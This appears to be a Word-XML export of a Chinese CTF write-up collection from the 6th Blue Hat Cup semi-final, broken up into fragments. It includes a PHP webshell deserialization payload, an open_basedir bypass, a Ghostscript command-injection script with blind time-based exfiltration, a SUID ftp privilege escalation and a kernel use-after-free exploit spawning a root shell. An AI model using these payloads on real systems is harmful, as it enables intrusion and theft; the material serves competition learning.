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09550" cy="4000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Style w:val="6"/>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:cs="Microsoft YaHei UI"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>8月4日，第六届“蓝帽杯”全国大学生网络安全技能大赛半决赛圆满结束，来自四大赛区的240支战队展开激烈角逐，勇攀巅峰！春秋GAME伽玛实验室精选了8道CTF题目的解题思路，一起学习~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easyfatfree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“小橘子真好吃“战队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" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:color w:val="3A3A3A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www.zip源码泄露，fatfree反序列化，入口点在Jig，本地测试能写进去，远程提示没有/var/www/html目录写权限，dirsearch扫到前端目录ui可写。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&lt;?php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namespace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DB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//! In-memory/flat-file DB wrapper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class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Jig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//@{ Storage formats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const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FORMAT_JSON=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FORMAT_Serialized=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//@}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protected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//! Storage location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$dir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'/var/www/html/ui/'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//! Current storage format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$format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'self::FORMAT_JSON'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//! Memory-held data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$data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'or4nge.php'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=&gt;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'a'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=&gt;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'&lt;?php eval($_POST[1]);?&gt;'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//! lazy load/save files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$lazy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TRUE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*   Read data from memory/file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*   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>@return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array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*   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>@param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$file string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**/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$jig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new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jig();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echo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urlencode(serialize($jig));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写shell后发现有open_basedir限制，绕过后直接读flag。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1=mkdir(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"s"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chdir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's'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);ini_set(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'open_basedir'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'..'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chdir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'..'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chdir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'..'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chdir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'..'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chdir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'..'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);ini_set(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'open_basedir'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'/'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echo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file_get_contents(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"/flag"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babynim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“小橘子真好吃“战队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nim语言，根据符号表进入找到main函数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使用readLine获取输入</w:t>
      </w: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48350" cy="85725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要求输入长度为42</w:t>
      </w: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953000" cy="124777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验证flag格式并提取内容</w:t>
      </w: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86750" cy="58102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877300" cy="2276475"/>
            <wp:effectExtent l="0" t="0" r="0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将flag转换为数字，并与另一串数字56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471相乘，要求结果为51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801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整除即可获得flag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ecc_stream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“小橘子真好吃“战队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本题的关键在于恢复p，总共有256组，猜测大概率有连续为0的4组，即在数组中均为点x的值，由点的递推关系可得3个同余方程组，将a^2和a视为两个不同变量，分别解出，再根据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a^2-(a)^2==k*p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>得到kp，发现不止一组，求gcd得到p。后续都非常顺理成章了。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res = []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253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var(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'aa a b'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eq = []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j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c0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(F[i+j]^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*F[i+j]*F[i+j+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c1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*F[i+j]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c2 = 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*(F[i+j]^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eq.append(aa+c0*a+c1*b+c2==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t0 = solve(eq, aa, a, b)[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].rhs()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t1 = solve(eq, aa, a, b)[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].rhs()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t1 = t1 ^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le = t0.numerator() * t1.denominator()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rh = t0.denominator() * t1.numerator()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res.append(abs(le - rh))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253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j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range(i +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253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ans = gcd(res[i], res[j])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ans &gt;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^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print(ans)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print(i, j)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解得a,b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zp = Zmod(p)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253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var(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'aa a b'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eq = []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j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c0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(F[i+j]^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*F[i+j]*F[i+j+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c1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*F[i+j]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c2 = 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F[i+j+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*(F[i+j]^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eq.append(aa+c0*a+c1*b+c2==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t0 = solve(eq, aa, a, b)[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].rhs()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t1 = solve(eq, aa, a, b)[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].rhs()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print(zp(t0.numerator())*zp(t0.denominator())^(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print(zp(t1.numerator())*zp(t1.denominator())^(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还原x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17820136898270565003583154860416743796390790040178335664072441472386305480761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a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9350908279444197743025002468741904275718898737006581492427705992219827176952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b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13500852895882965574928430100049589390809744881726797117323415176748623881582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E = EllipticCurve(GF(p),[a,b])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G = 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16581946065268567237817415232739386442228092328655083118189304246170597434332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6572297618785458302447485568200876595775007972363489568076029901524495685352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print(G)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print(G.xy()[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ans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256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try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x, y = G.xy()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F[i] == x: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ans +=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ans +=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^i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G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 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except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print(G.xy())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print(ans)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异或得到flag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random, hashlib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from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Crypto.Util.number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enc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'ba1e3092e2baba2ed9d70b5d847bb74d8a7b59461d16240c0017ed79c5e4052149129bc5d3c1112ad22e'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a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4009442033181566772244087448152745364151945732097529946674447227730338811104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x = hashlib.sha384(long_to_bytes(a)).digest()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flag = bytes([i^j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(i,j)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zip(bytes.fromhex(enc), x)])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print(flag)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神秘的日志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“小橘子真好吃“战队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用Windows事件查看器打开日志，阅读系统记录的操作逻辑发现日志记录时间顺序由近到远，NTLM过程中系统时间发生过改变。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查阅有关NTLM中继攻击的资料发现攻击过程中涉及到两次NTLM验证，即日志中的两条LSA记录。审计发现两次NTLM验证间系统发生了一次重启。查到对应的NTLM模式：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0080FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/articles/web/336237.html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287000" cy="28575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因此推测答案为security日志中第二次LSA记录的时间或NTLM验证结束后的第一次logon对应的时间，测试发现答案是md5{第二次LSA后第一个logon的timeCreated SystemTime}。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加密的通道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“小橘子真好吃“战队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一条条追踪http流，发现行为顺序是：用蚁剑连接1.php,写了rsa.php后用加密流量rce，尝试ls，测试写了flag.txt，再ls，最后写了一个真的flag。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流量发现rsa.php是用phpjiami的php，用phpjiami_decode-master解密还原得到：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&lt;?php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$cmd = @$_POST[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'ant'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$pk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&lt;&lt;&lt;EOF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-----BEGIN PUBLIC KEY-----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MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR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qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp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DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5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S5e5sSOF85kNq/zwwIDAQAB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-----END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PUBLIC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KEY-----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EOF;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$cmds = explode(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"|"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$cmd);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$pk = openssl_pkey_get_public($pk);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$cmd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foreach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($cmds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$value)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(openssl_public_decrypt(base64_decode($value), $de, $pk))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$cmd .= $de;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foreach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($_POST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$k =&gt; $v){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(openssl_public_decrypt(base64_decode($v), $de, $pk))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$_POST[$k]=$de;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eval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($cmd);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发现这是用公钥解密的，所以追踪最后一条流得到参数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k85c8f24ca50da=yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI%2FLggnmMXPblFZ6sDNJHoym6I0CkQIYr62%2B8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ%2BZKNN0%3D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用公钥解密后去掉前两位解base64即可。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onelinephp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伽玛实验室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题目只给了一个php eval 查看根目录flag 权限发现只有root可读，可猜测需要提权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使用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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>寻找存在suid权限的应用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287000" cy="39624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发现/usr/bin/netkit-ftp并不寻常，如果/usr/bin/netkit-ftp可以执行系统命令 就有利用的空间 通过查阅资料可以得知此应用为ubuntu自带的ftp应用 通过help功能即可发现ftp本身存在执行命令功能 即! 但是在实际操作中发现并不能直接通过这个功能进行php交互提权，于是查看该ftp源代码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80FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>https://github.com/mmaraya/netkit-ftp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287000" cy="939165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939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定位到功能实现代码可知是从系统变量中获取SHELL变量进行执行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287000" cy="410527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最终执行的是SHELL -c xxxx命令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因此可以通过export劫持系统变量来进行提权 但是尝试了bash、sh、dash都无法成功提权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可以将theshell劫持为其他可使用-c参数的程序来进行提权 这里找的是od -c 来读取flag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最终的exp：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putenv(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"SHELL=/usr/bin/od"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$descriptorspec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=&gt;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"r"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=&gt;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"w"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=&gt;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"r"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$file=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array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$process = proc_open(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"ftp"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$descriptorspec, $file);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var_dump($process);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var_dump($file);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function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readln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($file){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$out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$a = fread($file,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echo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"readln"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while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($a !=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$out = $out.$a;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$a = fread($file,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$out;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fputs($file[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"! /flag\n"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sleep(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"2"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$data = readln($file[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echo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$data;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0287000" cy="5724525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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TimeIsMoney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伽玛实验室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通过查看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DockerFile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>可以看到环境里面是包含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imageMagick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>的，并且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GhostScript9.5.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>是存在命令执行漏洞。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通过代码审计，可以发现这个服务一共包含两个路由。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首先是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/import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>，通过这个路由我们可以通过这个路由将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requeset body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>中的内容到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/tmp/image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>目录下。但是这个地方存在几个限制，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@RequestMapping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"/import"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public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String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importImage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(HttpServletRequest request)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throws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IOException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byte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[] bytes = org.apache.commons.io.IOUtils.toByteArray(request.getInputStream());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(bytes ==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|| bytes.length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throw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new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RuntimeException(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"invalid import operation"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bytes = filter(bytes);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(bytes !=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&amp;&amp; bytes.length &gt;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&amp;&amp; bytes.length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FileOutputStream fous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new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FileOutputStream(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"/tmp/image"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fous.write(bytes);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fous.flush();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fous.close();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"import image success fully"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"request has been filtered"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首先是对写入内容的限制。这里过滤了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pipe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>等关键字。我们可以在关键字中间插入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&lt;!-- --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>来绕过这个限制。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private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byte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[] filter(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byte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[] bytes)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String text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new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String(bytes);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String[] contentBlackList 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new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String[]{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"$"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"&amp;#"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"data"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"]"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"DATA"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"\\"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(String item : contentBlackList)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(text.contains(item))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bytes;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之后就是内容长度的限制，只允许400字符的长度。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并且观察到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docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>中，是存在一个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nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>反向代理的结构，而且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web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>这个服务是不出网的。这时候自然而然想到命令注入盲注来外带回显。所以顺着这个思路，编写以下脚本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time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string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base64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requests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from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argparse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ArgumentParser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PAYLOAD_TEMPLATE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"&lt;?xml version=\"1.0\" standalone=\"no\"?&gt; &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt; &lt;hui&gt;&lt;desc&gt;copies (%pipe%/tmp/;{payload}) (r) file showpage 0 quit &lt;/desc&gt; &lt;image href=\"epi:/proc/self/fd/3\" /&gt; &lt;svg width=\"1px\" height=\"1px\" /&gt; &lt;/hui&gt;\n"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payloadMaker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(command):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payload = PAYLOAD_TEMPLATE.format(payload = command ).replace(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"p&lt;!-- --&gt;ipe"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).replace(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"data"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"da&lt;!-- --&gt;ta"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payload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execute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(cmd):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cmd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"echo {} | base64 -d | bash"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.format(base64.b64encode(cmd.encode()).decode())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payload = payloadMaker(cmd)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now = time.time()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requests.get(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"{}/import"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.format(base_url),data=payload)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requests.get(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'{}/transform'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.format(base_url),timeout=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# print(time.time()-now)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__name__ ==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'__main__'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parser = ArgumentParser()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parser.add_argument(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'-u'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"--url"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,help=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'game url, eg: http://localhost:58080'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,required=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>True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parser.add_argument(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'-t'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'--timeout'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,help=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'http connection timeout,attetion seconds min is 3'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,default=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   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args = parser.parse_args()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base_url =args.url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timeout = args.timeout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timeout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parser.print_usage()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exit(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flag =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l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range(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50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x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string.printable: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try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execute(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"sleep $(cat /flag|cut -c{}|tr {} 4)"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.format(l,x))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except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Exception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as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flag += x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print(flag)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break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最后执行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python exploit -u http://localhost:20003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>即可获得flag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both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0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/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bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>Smurfs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 w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC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default" w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FFDA51"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>by 伽玛实验室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首先解包rootfs.cpio文件拿到ko文件，逆向分析发现存在3个功能,分别是add、del、edit，同时add只能申请两个堆块，在del里面有着明显的uaf漏洞，edit只能写八个字节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我们首先需要考虑的是如何泄露出我们想要的地址比如kernel或者heap的地址，我们可以利用modify_ldt这个系统调用来满足我们的设想，该系统调用提供四个功能，其中read_ldt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static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read_ldt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__user *ptr,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bytecount)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=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current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-&gt;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entries_size;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retval;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down_read(&amp;mm-&gt;context.ldt_usr_sem);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(!mm-&gt;context.ldt)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retval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out_unlock;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(bytecount &gt; LDT_ENTRY_SIZE * LDT_ENTRIES)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bytecount = LDT_ENTRY_SIZE * LDT_ENTRIES;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entries_size = mm-&gt;context.ldt-&gt;nr_entries * LDT_ENTRY_SIZE;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(entries_size &gt; bytecount)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entries_size = bytecount;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(copy_to_user(ptr, mm-&gt;context.ldt-&gt;entries, entries_size))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retval = -EFAULT;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out_unlock;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(entries_size != bytecount)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 Zero-fill the rest and pretend we read bytecount bytes.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(clear_user(ptr + entries_size, bytecount - entries_size))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retval = -EFAULT;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out_unlock;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retval = bytecount;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out_unlock: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up_read(&amp;mm-&gt;context.ldt_usr_sem);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retval;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可以看到有copy_to_user，假设我们能控制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mm-&gt;context.ldt-&gt;entries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>便可以任意地址读，并且如果失败则返回负数，因此我们可以通过这个特性来爆破出heap_addr，而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mm-&gt;context.ldt-&gt;entries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>会在write_ldt函数中申请赋值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static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write_ldt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__user *ptr,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bytecount,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oldmode)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=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current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-&gt;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mm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ldt_struct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new_ldt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old_ldt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old_nr_entries, new_nr_entries;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user_desc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ldt_info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desc_struct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-EINVAL;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(bytecount !=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(ldt_info))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-EFAULT;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(copy_from_user(&amp;ldt_info, ptr,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(ldt_info)))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-EINVAL;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(ldt_info.entry_number &gt;= LDT_ENTRIES)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(ldt_info.contents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(oldmode)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(ldt_info.seg_not_present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((oldmode &amp;&amp; !ldt_info.base_addr &amp;&amp; !ldt_info.limit) ||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LDT_empty(&amp;ldt_info))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 The user wants to clear the entry.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memset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(&amp;ldt,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(ldt));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(!ldt_info.seg_32bit &amp;&amp; !allow_16bit_segments())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error = -EINVAL;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fill_ldt(&amp;ldt, &amp;ldt_info);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(oldmode)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ldt.avl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(down_write_killable(&amp;mm-&gt;context.ldt_usr_sem))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-EINTR;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old_ldt       = mm-&gt;context.ldt;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old_nr_entries = old_ldt ? old_ldt-&gt;nr_entries :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new_nr_entries = max(ldt_info.entry_number +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old_nr_entries);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-ENOMEM;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 = alloc_ldt_struct(new_nr_entries);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(!new_ldt)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out_unlock;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(old_ldt)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memcpy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(new_ldt-&gt;entries, old_ldt-&gt;entries, old_nr_entries * LDT_ENTRY_SIZE);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new_ldt-&gt;entries[ldt_info.entry_number] = ldt;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finalize_ldt_struct(new_ldt);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If we are using PTI, map the new LDT into the userspace pagetables.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If there is already an LDT, use the other slot so that other CPUs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will continue to use the old LDT until install_ldt() switches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them over to the new LDT.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map_ldt_struct(mm, new_ldt, old_ldt ? !old_ldt-&gt;slot :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(error)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* This only can fail for the first LDT setup. If an LDT is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* already installed then the PTE page is already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* populated. Mop up a half populated page table.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(!WARN_ON_ONCE(old_ldt))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free_ldt_pgtables(mm);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free_ldt_struct(new_ldt);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goto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out_unlock;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install_ldt(mm, new_ldt);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unmap_ldt_struct(mm, old_ldt);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free_ldt_struct(old_ldt);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out_unlock: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up_write(&amp;mm-&gt;context.ldt_usr_sem);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out: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error;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我们注意到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new_ldt = alloc_ldt_struct(new_nr_entries);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>，其会调用alloc_ldt_struct函数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static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struct ldt_struct *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alloc_ldt_struct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num_entries)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ldt_struct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new_ldt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alloc_size;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(num_entries &gt; LDT_ENTRIES)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56B6C2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 = kmalloc(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(struct ldt_struct), GFP_KERNEL_ACCOUNT);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(!new_ldt)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56B6C2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BUILD_BUG_ON(LDT_ENTRY_SIZE !=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(struct desc_struct));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alloc_size = num_entries * LDT_ENTRY_SIZE;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Xen is very picky: it requires a page-aligned LDT that has no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trailing nonzero bytes in any page that contains LDT descriptors.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Keep it simple: zero the whole allocation and never allocate less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 than PAGE_SIZE.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(alloc_size &gt; PAGE_SIZE)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new_ldt-&gt;entries = __vmalloc(alloc_size, GFP_KERNEL_ACCOUNT | __GFP_ZERO);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new_ldt-&gt;entries = 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*)get_zeroed_page(GFP_KERNEL_ACCOUNT);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(!new_ldt-&gt;entries)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kfree(new_ldt);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56B6C2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>NULL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 The new LDT isn't aliased for PTI yet.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new_ldt-&gt;slot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new_ldt-&gt;nr_entries = num_entries;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new_ldt;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而该函数会调用kmalloc来申请堆块，size为ldt_struct的大小即为0x10,假设我们通过uaf修改entries然后在调用read_ldt这时候就可以做到任意地址读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ldt结构体：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ldt_struct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Xen requires page-aligned LDTs with special permissions.  This is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needed to prevent us from installing evil descriptors such as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call gates.  On native, we could merge the ldt_struct and LDT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allocations, but it's not worth trying to optimize.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desc_struct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*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entries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nr_entries;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If PTI is in use, then the entries array is not mapped while we're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in user mode.  The whole array will be aliased at the addressed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given by ldt_slot_va(slot).  We use two slots so that we can allocate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and map, and enable a new LDT without invalidating the mapping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of an older, still-in-use LDT.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 slot will be -1 if this LDT doesn't have an alias mapping.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     */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slot;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通过爆破泄露出heap_base以及kernel_base然后我们申请一个0x20的堆块将其free掉，然后通过劫持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seq_options-&gt;stat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>指针来劫持流程，将其劫持成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9B6E23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFF5E3"/>
        </w:rPr>
        <w:t>xchg eax,esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>来进行栈迁移至用户态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78" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>exp：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</w:pP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#define _GNU_SOURCE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&lt;err.h&gt;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&lt;errno.h&gt;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&lt;fcntl.h&gt;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&lt;inttypes.h&gt;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&lt;sched.h&gt;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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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&lt;string.h&gt;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&lt;unistd.h&gt;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&lt;net/if.h&gt;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&lt;netinet/in.h&gt;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&lt;sys/ipc.h&gt;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&lt;sys/msg.h&gt;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&lt;asm/ldt.h&gt;  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&lt;sys/socket.h&gt;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&lt;sys/syscall.h&gt;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&lt;linux/netfilter_ipv4/ip_tables.h&gt;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&lt;stdint.h&gt;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&lt;sys/mman.h&gt;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&lt;signal.h&gt;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&lt;linux/keyctl.h&gt;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#include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&lt;sys/prctl.h&gt;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#define SIZE 0x60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user_cs, user_ss, user_rflags, user_sp;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commit_creds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prepare_kernel_cred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vmlinux_base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data[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0x400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modprobe_path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kernel_base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raceSign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save_status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__asm__(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"mov user_cs, cs;"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"mov user_ss, ss;"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"mov user_sp, rsp;"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"pushf;"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"pop user_rflags;"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puts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"[*]status has been saved."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get_shell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"/bin/sh"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getroot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*(*pkc)(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*) = prepare_kernel_cred;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(*cc)(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*) = commit_creds;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cc(pkc(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swapgs_iretq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__asm__(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"swapgs;"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"iretq;"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spawn_shell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 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"/bin/sh"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add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fd,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size,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char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*buf){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arg[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= {size,buf};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ioctl(fd,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0x20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,arg);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del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fd,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idx){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arg[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= {idx};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ioctl(fd,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0x30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,arg);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edit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fd,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idx,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size,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char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*buf){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arg[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= {idx,size,buf};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ioctl(fd,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0x50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,arg);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msg_msg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m_list_next;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m_list_prev;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m_type;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m_ts;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next;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security;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msg_msgseg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next;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pipe_buffer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page;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uint32_t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offset;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uint32_t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len;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ops;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uint32_t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flags;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uint32_t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pad;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private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mtype;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char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mtext[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0x4000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 msgbuf;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pipe_buf_operations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confirm;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release;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steal;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get;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add_msg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msqid,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const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*msgp,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msgsz)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(msgsnd(msqid, msgp, msgsz,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perror(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"[-] msgsnd"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show_msg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msqid,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*msgp,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msgsz)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(msgrcv(msqid, msgp, msgsz,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MSG_COPY | IPC_NOWAIT)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perror(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"[-] msgrcv"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free_msg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msqid,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*msgp,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msgsz,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msgtyp)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(msgrcv(msqid, msgp, msgsz, msgtyp,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perror(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"[-] msgrcv"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msg_get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pid = msgget(IPC_PRIVATE,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0666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| IPC_CREAT);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(pid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perror(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"msgget"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pid;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show_buf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*buf,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size){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;i&lt;size;i++){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"%d ==&gt; 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,i,*(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*)(buf + i*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build_msg_msg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(struct msg_msg *msg,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m_list_next,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m_list_prev,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m_type,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m_ts,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next)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msg-&gt;m_list_next = m_list_next;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msg-&gt;m_list_prev = m_list_prev;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msg-&gt;m_type = m_type;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msg-&gt;m_ts = m_ts;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msg-&gt;next = next;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msg-&gt;security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void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modprobe_hax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"echo '#!/bin/sh' &gt; /tmp/x; echo 'setsid cttyhack setuidgid 0 /bin/sh' &gt;&gt; /tmp/x"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"chmod +x /tmp/x"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ff = open(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"/tmp/asd"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O_WRONLY|O_CREAT);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write(ff, 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"\xff\xff\xff\xff"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close(ff);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"chmod 777 /tmp/asd; /tmp/asd"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system(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"sh"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init_cred;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prepare_kernel_cred;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commit_creds;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pop_rdi;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seq_fd;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swapgs_restore_regs_and_return_to_usermode;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struct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user_desc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u_desc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target[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61AEEE"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="282C34"/>
        </w:rPr>
        <w:t>main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signal(SIGSEGV, spawn_shell);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signal(SIGTRAP, spawn_shell);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save_status();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fd = open(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"/dev/kernelpwn"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(fd &lt;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puts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"Open Error"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_exit(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char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*buf =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calloc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0x4000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char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*buf1 